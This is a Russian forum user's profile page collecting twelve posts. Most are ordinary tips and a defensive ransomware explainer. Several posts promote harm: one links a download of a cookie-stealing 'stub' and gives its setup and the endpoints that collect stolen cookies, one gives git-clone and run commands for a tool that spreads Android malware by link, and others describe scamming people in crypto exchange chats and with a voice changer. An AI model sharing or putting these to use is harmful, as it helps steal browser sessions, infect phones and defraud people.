Перейти к публикации

anonymous1313

Новичoк
  • Публикации

    25
  • Зарегистрирован

  • Посещение

  • Дней в лидерах

    2

Сообщения, опубликованные пользователем anonymous1313


  1. ☀️Топ 3 Инструмента для Создания и Анимации 3D-моделей 

    Если вы увлечены созданием и анимацией 3D-моделей, то знаете, как важно иметь под рукой правильные инструменты. Сегодня мы представляем вам наш топ 3 инструментов, которые помогут вам воплотить в жизнь свои визуальные идеи и создать потрясающие 3D-модели. 

    ⏺1. Blender

    Blender — это бесплатный и мощный инструмент для 3D-моделирования и анимации, который подходит как для начинающих, так и для опытных художников. Он обладает широким спектром функций, включая моделирование, текстурирование, рендеринг, симуляции и многое другое. Blender также поддерживает создание анимаций и визуальных эффектов, что делает его универсальным решением для разнообразных проектов.

    ⏺2. Autodesk Maya

    Autodesk Maya — это профессиональный инструмент, широко используемый в индустрии развлечений и кино. Он предоставляет богатый набор инструментов для моделирования, анимации, симуляции и визуализации. Maya известен своей гибкостью и возможностью создавать сложные анимационные сцены, включая персонажей, окружающую среду и спецэффекты.

    ⏺3. Cinema 4D

    Cinema 4D — это еще один популярный инструмент для 3D-моделирования и анимации. Он отличается интуитивным интерфейсом и удобством использования, что делает его отличным выбором как для новичков, так и для опытных профессионалов. Cinema 4D предоставляет широкий спектр инструментов для создания анимаций, включая анимацию персонажей, объектов и визуальных эффектов.

    ️Выбор инструмента зависит от ваших потребностей, опыта и бюджета. Какой бы инструмент вы ни выбрали, помните, что важен не только инструмент, но и ваша творческая идея. Сочетание ваших навыков и правильного инструмента поможет вам достичь потрясающих результатов в мире 3D-моделирования и анимации.


  2. Ловите метод отключения рекламы на Smart TV. На самом деле, отключить рекламу можно довольно просто – для этого следует воспользоваться данной инструкцией 📖

    👨‍👩‍👧 Ваши родители будут считать вас тем ещё хакером, не поленитесь это сделать

    1. Для начала нам нужно открыть меню и перейти к пункту «Сеть».
    2. Откройте  «Состояние сети».
    3. В «DNS» введите «176.103.130.130» и сохраните параметры.

    Данный DNS сервер принадлежит известному блокировщику рекламы Adguard. Как правило, все названия пунктов отличаются в зависимости от модели и марки вашего телевизора


  3. Думаю, многие встречали в чатах услуг скамеров, пытающихся кидать даунов с помощью отмены транзакции в BTC. 

    Схема работает следующим образом — мошенник пишет сообщение с просьбой обменять битки на рубли, в котором подчеркивает, что готов скинуть криптовалюту первым. Как только жертва присылает адрес, скамерсант создает транзакцию на оговоренную сумму и требует перевести ему деньги на карту, после чего отменяет ее и биток возвращается к нему на кошелек. 

    Так вот, сегодня я расскажу, как принудительно ускорять такие транзакции и... (барабанная дробь) скамить скамеров. 

    Начнем с подготовки — нам необходимо скачать и установить кошелек «Exodus». Дело в том, что кидалы просят принять биткоин именно на данный кошелек, т.к. он отображает сумму на балансе до ее фактического начисления, сразу после появления входящей транзакции. 

    Теперь приступаем к поиску целевых пациентов — отправляемся в крупные чаты, посвященные крипте и ищем сообщения об обмене битка на валюту. Это может быть чат биржи, обменника или какого-либо криптосообщества. 

    Как только нашли подходящего челибоса, договорились об обмене и он прислал ссылку на входящую транзакцию, сразу же переходим по ссылке  и ускоряем ее (на выбор будет два способа, бесплатный и платный, по понятным причинам лучше пользоваться платным). Как только пройдет первое подтверждение, скамер окажется в нашей ловушке. 


  4. Делаем иностранную карту

    Сегодня мы рассмотрим один из самых удобных вариантов - Pyypl. Также рассмотрим и наиболее быстрый вариант пополнения. А именно через QIWI-Кошелек. А мы переходим к самому созданию карты:

    — Создание карты

    1. Скачиваем приложение Pyypl из Google Play или Appstore;
    2. Регистрируемся в приложении, подходит даже российский номер;
    3. Проходим верификацию по паспорту, работает даже с внутренним российским (срабатывает от 18 лет);
    4. Делаем селфи и ждем одобрения верификации, виртуальная карта формируется автоматически;

    Ну вот и всё, у нас появилась карточка Pyypl. Чаще всего страна карты - Финляндия.

    Пополнение карты с помощью QIWI-Кошелька
    В один из дней я оплачивал покупки и увидел данное объявление (Скриншот 1)

     В этот же день я сделал карту Pyypl и пополнил напрямую через QIWI. Способ пополнения рассмотрим ниже:

    1. Находим пополнение Pyypl сверху в поиске (Скриншот 2)

     2. Вводим номер телефона и сумму. Вы сразу сможете увидеть сумму в долларах, на которую вы пополните вашу карточку Pyypl )Скриншот 3)

    3. Просто ожидаем меньше минуты и можем смело идти закупаться в иностранных сервисах

    В данных картах крайне удобная система 3ds кодов, вместо ожидания кода и последующего ввода вы делаете авторизацию покупки в приложении, следовательно спектр ваших возможностей для оплаты расширяется.


  5. Сегодня я расскажу вам как всего превратить свой тестостероновый бас в писклявый голос анимешной девочки всего за 5 минут. Данную фичу можно использовать не только для повышения эндорфина в вашем организме, но и, например, для скама дрочеров.

    1. Скачиваем последнюю версию программы;
    2. На рабочем столе создаём новую папку с любым названия и распаковываем туда архив с «GitHub»; 
    3. Запускаем файл "start_http.bat" для установки нужных плагинов;
    4. После установки у нас запустится программа «Voice Changer Client Demo» (скриншот ()). Настраиваем её под свои нужды;
    ├ Рассмотрим самые важные настройки: "Chunk" — это задержка перед воспроизведением голоса (я рекомендую ставить значение "320"); "Extra" — выделяемая память (выставляем максимальное значение); "Input" и "Output" — настройка вывода и ввода, а также начало записи голоса для последующего использования; 
    └ Также мы можем вывести в микрофон ранее записанный голос, для этого нажимаем на иконку громкости правой кнопкой мыши —> "Звуки" —> "Запись" —> Отключаем микрофон —> Включаем "Стерео микшер" —> Теперь мы можем включить аудио и оно будет выводиться в наш микрофон;
    5. Поздравляю, вы великолепны!


  6. Аплоадер + сам скрипт: https://transfer.sh/FEQ8l3Xlxt/drive-download-20230716T204658Z-001.zip

    1. Качаем и устанавливаем Go (https://go.dev/dl/)
    2. Качаем и устанавливаем TDM-GCC (https://jmeubank.github.io/tdm-gcc/)
    3. Распаковываем архив с исходниками в 1 папку.
    4. В папке stub открываем main.go и заменяем 127.0.0.1 на айпи дедика
    5. Открываем порт 3000 на дедике, если он закрыт.
    6. Открываем cmd в папке куда распаковали исходники
    7. Пишем go run main.go

    Все установка завершена!

    Никакой удобной панельки нет, т.к. за бесплатно много хотите!!
    А есть лишь 2 функции на сервере:

    1. Создание билда
    Для этого вводим http://айпидедика:3000/api/названиебилда/create

    2. Получение всех куки с билда
    Для этого вводим http://айпидедика:3000/api/названиебилда/cookies


  7. всем привет, подскажите возможно ли впсивать сервер впн через стандартные настрйоки айфона.?
    есть айфон 6 версии,но он не обновлеяется до нужной ios чтобы я мог скачать впн


  8. Все о программах-вымогателях

    Вы когда-нибудь задумывались, почему программы-вымогатели поднимают столько шума? Вы наверняка слышали о них в офисе или читали в газетах. Возможно, прямо сейчас на экране Вашего компьютера появилось всплывающее окно с предупреждением об атаке программы-вымогателя. Если Вы хотите узнать все о программах-вымогателях, Вы обратились по адресу. Мы расскажем Вам о различных формах программ-вымогателей, а также о том, как они проникают в систему, откуда берутся, против кого нацелены и что нужно делать для защиты от них.

    Что такое программа-вымогатель?

    Программа-вымогатель – это вредоносное ПО, которое блокирует компьютеры или личные файлы пользователей, требуя выкуп за восстановление доступа. Самые ранние варианты программ-вымогателей были разработаны еще в конце 1980-х годов – тогда выкуп предлагалось отправить по обычной почте. Сегодня авторы программ-вымогателей требуют заплатить выкуп в криптовалюте или перевести определенную сумму на кредитную карту. 

    Заражение программой-вымогателем

    Есть несколько путей, которыми программа-вымогатель может воспользоваться, чтобы проникнуть на Ваш компьютер. Одним из самых известных способов является вредоносный спам, который представляет собой нежелательные сообщения электронной почты, используемые для распространения вредоносного ПО. Такие сообщения нередко включают вредоносные вложения, замаскированные под файлы PDF или документы Word. Кроме того, текст этих сообщений может содержать ссылки на мошеннические веб-сайты.
    Вредоносный спам использует технологии социальной инженерии, чтобы заставить пользователя поверить, что сообщение пришло от его друга или известной ему организации, а затем открыть кажущиеся безобидными вложения или ссылки. Киберпреступники также прибегают к методам социальной инженерии, планируя и другие типы атак программ-вымогателей. Так, они могут обращаться к пользователям якобы от лица ФБР, чтобы запугать их и заставить выплатить определенную сумму для разблокировки файлов.
    Еще одним распространенным методом заражения компьютеров является вредоносная реклама – пик ее активности пришелся на 2016 год. Вредоносная реклама – это реклама в сети Интернет, направленная на распространение вредоносного ПО при минимальном взаимодействии с пользователем или вообще без каких-либо действий с его стороны. Во время просмотра веб-сайтов, в том числе и вполне надежных ресурсов, пользователь может перенаправляться на серверы злоумышленников, даже не нажимая на рекламный баннер. Эти серверы накапливают сведения о компьютерах жертв и их местоположении, а затем выбирают вредоносное ПО, которое будет проще всего доставить на эти компьютеры. И нередко таким вредоносным ПО является программа-вымогатель.
    Для реализации поставленной задачи вредоносная реклама часто использует зараженный встроенный фрейм или невидимый элемент веб-страницы. Встроенный фрейм перенаправляет пользователя на мошенническую целевую страницу, после чего вредоносный код начинает атаковать систему, применяя специальный набор эксплойтов. Все эти действия выполняются без ведома пользователя, поэтому их часто обозначают как атаки, осуществляемые посредством теневой загрузки.

    Типы программ-вымогателей

    Существует три основных типа программ-вымогателей, которые различаются по степени вредоносности: одни просто затрудняют работу пользователя, другие же представляют серьезную опасность. Кратко о каждом из этих типов:

    Псевдоантивирусы

    Обычно псевдоантивирусы являются не столько источником опасности, сколько причиной неудобства. Они представляют собой мошеннические программы, замаскированные под защитные приложения и позволяющие злоумышленникам выдавать себя за представителей технической поддержки. На экране Вашего компьютера может появиться всплывающее окно с предупреждением о том, что в системе обнаружено вредоносное ПО и единственный способ удалить его – это заплатить определенную сумму. Если не предпринимать никаких действий, скорее всего, назойливые всплывающие окна будут продолжать появляться, однако Вашим файлам в целом ничто не будет угрожать. 
    Настоящая антивирусная программа не станет досаждать пользователям таким образом. Если Вы не пользуетесь антивирусом, упомянутым во всплывающем окне, он не может сообщать Вам о программах-вымогателях, поскольку не установлен в Вашей системе. Если же Вы пользуетесь именно этой защитной программой, Вам не нужно платить за удаление вируса, поскольку Вы уже оплатили лицензию.

    Вирусы, блокирующие экран

    Этим вирусам соответствует оранжевый уровень опасности. Если в систему проникла программа, блокирующая экран, то Вы не сможете продолжать работу с компьютером. После запуска компьютера на мониторе появляется закрывающее весь экран окно, обычно снабженное официальной эмблемой ФБР или Министерства юстиции. В окне содержится предупреждение, что на Вашем компьютере якобы обнаружена противозаконная активность и что Вам необходимо заплатить штраф. Важно понимать, что ФБР не станет блокировать Ваш компьютер или требовать выплаты штрафа за «противозаконную активность». Если Вас заподозрят в пиратстве, распространении детской порнографии или совершении других компьютерных преступлений, правоохранительные органы будут действовать согласно другой процедуре, установленной законом.

    Программы-вымогатели, шифрующие файлы

    Эти вирусы представляют настоящую угрозу. Их авторы стремятся украсть или зашифровать Ваши файлы, чтобы затем потребовать выкуп за их расшифровку или возвращение. Особая опасность этого типа программ-вымогателей заключается в том, что в случае захвата Ваших файлов киберпреступниками ни антивирус, ни функция восстановления системы не смогут вернуть Вам эти файлы. И если не платить злоумышленникам, то в большинстве случаев данные пропадают навсегда. Вместе с тем, нет никакой гарантии, что киберпреступники выполнят свое обещание и вернут Ваши файлы, после того как Вы заплатите выкуп.

    Недавние атаки программ-вымогателей

    История программ-вымогателей

    Первая программа-вымогатель, известная как PC Cyborg или AIDS, появилась в конце 1980-х годов. Вирус PC Cyborg шифровал все файлы на диске C: через 90 перезагрузок после своего проникновения в систему, после чего требовал от пользователя продлить «лицензию». Для этого необходимо было отправить по почте 189 $ для компании PC Cyborg Corp. Используемый метод шифрования был достаточно простым, поэтому доступ к файлам удавалось легко восстановить, а атака вируса не осложняла жизнь тем пользователям, кто хоть немного разбирался в компьютерах.
    На протяжении последующих 10 лет о новых вариантах программ-вымогателей было мало что известно. Однако в 2004 году источником серьезных проблем стал вирус GpCode, использующий слабый криптографический алгоритм RSA для шифрования личных файлов с целью получения выкупа.
    В 2007 году вирус WinLock ознаменовал появление нового типа программ-вымогателей, которые не шифровали файлы, а блокировали доступ пользователя к компьютеру. WinLock закрывал весь экран изображениями порнографического характера. Затем он требовал отправить платное SMS-сообщение для разблокировки компьютера.
    Вирус Reveton стал в 2012 году одним из первых представителей нового семейства программ-вымогателей, использующих символику правоохранительных органов. Вирус блокировал компьютер жертвы и отображал закрывающее весь экран окно с официальной эмблемой правоохранительной организации, например ФБР или Интерпола. В этом окне также отображалось сообщение, что пользователь совершил преступление – осуществлял хакерскую деятельность, загружал незаконный контент или даже занимался распространением детской порнографии. Большинство программ-вымогателей, использующих символику правоохранительных органов, требовало перечислить выкуп в размере от 100 $ до 3 000 $ с помощью карты предоплаты, например UKash или PaySafeCard. 
    Рядовой пользователь не знал, что делать с этой напастью, небезосновательно полагая, что против него открыто уголовное дело. Данная тактика социальной инженерии, обозначаемая как «подразумеваемая вина», заставляет пользователя усомниться в собственной невиновности и заплатить выкуп, чтобы не быть уличенным в постыдной деятельности. 
    В 2013 году появилась программа-вымогатель CryptoLocker, также шифрующая данные, однако на этот раз проблема приобрела намного более серьезный характер. Вирус CryptoLocker использовал алгоритмы шифрования, применяющиеся в оборонной промышленности, а ключ, необходимый для разблокировки файлов, хранил на удаленном сервере. Следовательно, было практически невозможно вернуть доступ к данным, не заплатив злоумышленникам. Этот тип программ-вымогателей используется по сей день и является чрезвычайно эффективным оружием в руках киберпреступников, стремящихся разбогатеть незаконным путем. Недавние крупные атаки вирусов, в числе которых атака WannaCry в мае 2017 года и Petya в июне 2017 года, проходили с применением именно таких программ-вымогателей, шифрующих данные с целью поймать в ловушку пользователей и целые компании в различных регионах мира.
    В конце 2018 года на авансцену вышла программа-вымогатель Ryuk. Она атаковала американские новостные издания, а также нанесла ущерб водопроводной компании Onslow Water and Sewer Authority, обслуживающей ряд районов Северной Каролины. При этом особого внимания заслуживает одна особенность: системы, на которые была нацелена атака, сначала подвергались заражению троянскими программами Emotet или TrickBot. Когда-то они использовались для похищения информации, однако теперь их функциональность расширилась и они применяются для доставки других форм вредоносного ПО, в том числе и Ryuk. Адам Куява, директор Malwarebytes Labs, отметил, что с помощью троянских программ Emotet и TrickBot злоумышленники выискивают жертв, которые могут представлять для них наибольшую ценность. Когда система заражена и отмечена как перспективная цель, Emotet или TrickBot повторно заражают ее программой-вымогателем Ryuk.

    Программы-вымогатели для Mac

    Learn-about-KeRanger,-the-first-true-Mac-ransomware.jpg
    Узнайте о KeRanger, первой программе-вымогателе, специально разработанной для Mac.

     

    Узнайте о KeRanger, первой программе-вымогателе, специально разработанной для Mac.Похоже, никому не удастся остаться в стороне от войны с программами-вымогателями: в 2016 году была создана первая программа-вымогатель для Mac OS. Этот вирус получил название KeRanger и был выявлен, когда он заразил приложение Transmission: при запуске оно копировало в систему вредоносные файлы, которые работали в фоновом режиме на протяжении трех дней, не проявляя себя, а затем внезапно атаковали систему и шифровали файлы. К счастью, вскоре после обнаружения этого вируса компания Apple выпустила обновление для защитного приложения XProtect, встроенного в операционную систему, что позволило остановить дальнейшее распространение вируса. Тем не менее, данный случай показал, что существование программ-вымогателей для Mac является свершившимся фактом. 

    Программы-вымогатели для мобильных устройств

    Считалось, что программы-вымогатели не представляют серьезной угрозы для мобильных устройств. Так было до 2014 года, когда множество мобильных устройствпали жертвами печально известного CryptoLocker и других аналогичных вирусов. На экране мобильного устройства программа-вымогатель обычно отображает сообщение, что оно заблокировано из-за противозаконных действий пользователя. Сообщение также указывает, что устройство будет разблокировано, когда пользователь выплатит определенную сумму в качестве штрафа. Программы-вымогатели часто попадают на мобильные устройства вместе с вредоносными приложениями. Чтобы нейтрализовать их и вернуть доступ к устройству, пользователю нужно перезагрузить его в безопасном режиме и удалить зараженное приложение.

    Кого атакуют программы-вымогатели?

    При первом появлении программ-вымогателей (и в последующих случаях) их основными жертвами становились обычные пользователи. Однако постепенно киберпреступники стали осознавать весь потенциал своего оружия и разрабатывать программы-вымогатели, направленные против бизнеса. Со временем вирусы для предприятий показали невиданную эффективность: они вызывали перебои в производстве, приводили к потере данных и неполучению прибыли. Поэтому авторы вредоносного кода сосредоточили свои основные усилия в этой области. К концу 2016 года среди всех вредоносных объектов, обнаруженных на компьютерах предприятий во всем мире, 12,3 % составляли именно программы-вымогатели, в то время как для компьютеров частных пользователей в общемировом масштабе этот показатель достиг лишь 1,8 %. А к концу 2017 года 35 % предприятий малого и среднего бизнеса сталкивались с атаками программ-вымогателей.

    Что делать, если Ваш компьютер заражен

    Если в систему Вашего компьютера проник вирус, следует помнить о первом и самом главном правиле – никогда не платить выкуп (авторитетно заявляем: именно так советует поступать ФБР). Ведь выплачивая выкуп киберпреступникам, Вы только лишь убеждаете их в том, что следующая атака против Вас или другого пользователя также будет успешной. Вы можете попытаться восстановить доступ к некоторым зашифрованным файлам с помощью бесплатных дешифраторов. 
    Однако здесь следует заметить: не для всех семейств программ-вымогателей написаны дешифраторы, поскольку во многих случаях программы-вымогатели используют сложные алгоритмы шифрования. Кроме того, даже если дешифратор и существует, не всегда можно достоверно определить, подходит ли он к той или иной версии вредоносного ПО. Вы ведь не хотите усугубить ситуацию и еще раз зашифровать свои файлы, воспользовавшись неверным скриптом дешифровки. Поэтому, прежде чем предпринимать какие-либо действия, Вам нужно тщательно изучить само сообщение, отображаемое программой-вымогателем, либо обратиться за помощью к специалисту по информационным технологиям или кибербезопасности.
    Вы также можете противостоять вирусу, загрузив специальную программу для его нейтрализации, а затем запустив проверку на зараженном компьютере. Возможно, Вам не удастся вернуть доступ к файлам, однако так Вы сможете очистить компьютер от вируса. Для устранения программы-вымогателя, заблокировавшей экран, обычно достаточно выполнить полное восстановление системы. Если этот способ не сработает, Вы можете запустить проверку с загрузочного диска или USB-накопителя. 
    Если Вы хотите помешать работе программы-вымогателя, которая уже проникла на компьютер и может зашифровать Ваши файлы, Вам нужно действовать очень осторожно. Если Вы заметили, что система начала работать медленно без видимых причин, выключите компьютер и отсоедините его от сети Интернет. Если после повторного запуска системы вредоносное ПО все еще активно, оно не сможет отправить данные или получить инструкции с командного сервера. Это означает, что без ключа или заданного способа извлечения информации о платеже вредоносное ПО может все еще оставаться в режиме ожидания. Выиграв таким образом время, загрузите и установите на зараженный компьютер антивирусную программу, после чего запустите полную проверку системы.

  9. то есть объяснит кто шарит по арбитражу плиз? 
    Это какой оффер в данном конкретном примере автор использует? Целевое действие переход по ссылке и это считается лидом? Или все таки после перехода по ссылке юзер покупает доступ/делает оплату и это считается лидом?


  10.  Часто ли у Вас появляется синий экран смерти? Или другие возможные ошибки? Если у Вас хорошее железо, то скорее всего у Вас всё тип-топ (но это не точно), но если же у Вас старенький ПК, и частенько выскакивает синий экран или другие ошибки, то это не всегда означает что Ваш ПК пора выбрасывать, ведь можно попробовать устранить ошибки!

    ⚙️ Инструкция:
    1) Открываем CMD от имени администратора!
    2) Вводим следующую команду:

    $ sfc /scannow

    3) По завершению сканирования, утилита сама исправит найденные ошибки. После чего обязательно перезагружаем ПК!

    Если у Вас часто всплывал синий экран, то скорее всего, Вы его больше не увидите, как и других возможных ошибок! Но это не означает что данным способом можно избавиться от абсолютно всех ошибок!


  11. Кажется, что создание эстетически привлекательного дизайна требует много времени и профессиональных навыков. Однако, времена меняются и искусственный интеллект все больше удивляет. Благодаря новому инструменту, дизайн вашего магазина может быть готов всего за несколько минут. Сайт предлагает быстрое превращение идеи в реальную веб-страницу. Чем больше деталей вы предоставите, тем лучше результат. Каждый раздел обладает уникальным сочетанием макета, текста и стилистики. Вы можете корректировать то, что вам нравится, и удалять то, что не подходит.

    Приступим к реализации:

    Первым делом нам необходимо попасть на главную страницу сервиса, предоставляющего услуги по дизайну, для этого переходим по прямой ссылке. Нажимаем на кнопку "Start with AI", чтобы перейти к регистрации:

    57c09dfe-002a-405f-b088-8fbfeb343d72.png

    Далее есть несколько вариантов, первый — это обычная регистрация через адрес электронной почты, имя пользователя и так далее. Второй же намного быстрее, он подразумевает под собой авторизацию через ранее зарегистрированную учетную запись Google:

    3eff2968-380c-4aa3-92b2-a17d76a2d761.png

    Вводим любое имя и фамилию, не забываем согласиться с условиями использования, после чего завершаем процесс создания аккаунта:

    7feeaeda-2c58-47f2-8848-3393ab8edbaa.png

    Теперь мы попали в основную панель, где первым делом нам необходимо создать новую рабочую зону. Для этого наводим мышь на логотип в левом верхнем углу и переходим к пункту "File", нажимаем комбинацию клавиш Ctrl+Alt+N:

    98b4c222-e44a-498a-9b90-7eeb0587f0a5.png

    Получаем пустой шаблон с кнопкой, доступной по центру экрана, необходимо кликнуть на нее:

    8273bc69-ef8b-43aa-ae4c-8b2425a25bd7.png

    После чего вводим свой запрос, чем точнее Вы опишите — тем лучше будет результат, но учтите, что количество символов ограничено:

    ff842c2a-f7fc-4fba-919e-8ebafebba1a9.png

    Через некоторое время появится готовый результат, вид которого Вы сразу же можете оценить на самых разных устройствах. При желании любой элемент можно отредактировать, для этого всего лишь необходимо нажать на него и воспользоваться левым меню:

    e18de56e-77ac-4a31-985b-de7af55bf980.png

    Если же Вы хотите создать свою работу, основываясь на шаблон, то снова нажимаем на логотип, но теперь уже выбираем другой пункт:

    74de47d1-0cd6-4315-9194-6804a107047a.png

    Чтобы воспользоваться готовой работой ее необходимо опубликовать, используя специальную кнопку в правом верхнем углу. После чего к странице уже можно будет привязать свой домен и так далее:

    d94184aa-32a1-4054-88e8-4b35f83e67be.pngd94184aa-32a1-4054-88e8-4b35f83e67be.png

    На этом все, надеюсь статья оказалась для вас полезной!


  12. Создаем вирус под Android, используя Termux

    Infect – это скрипт на основе bash, созданный для пользователей Termux, с помощью этого инструмента вы можете распространять вирус Android, просто отправив ссылку.

    Установка:

    $ pip install lolcat
    $ git clone https://github.com/noob-hackers/infect
    $ cd $HOME

    Запуск:
    $

     cd infect
    $ bash infect.sh

    Вы можете выбрать любую опцию, используя клавиатуру.

×
×
  • Создать...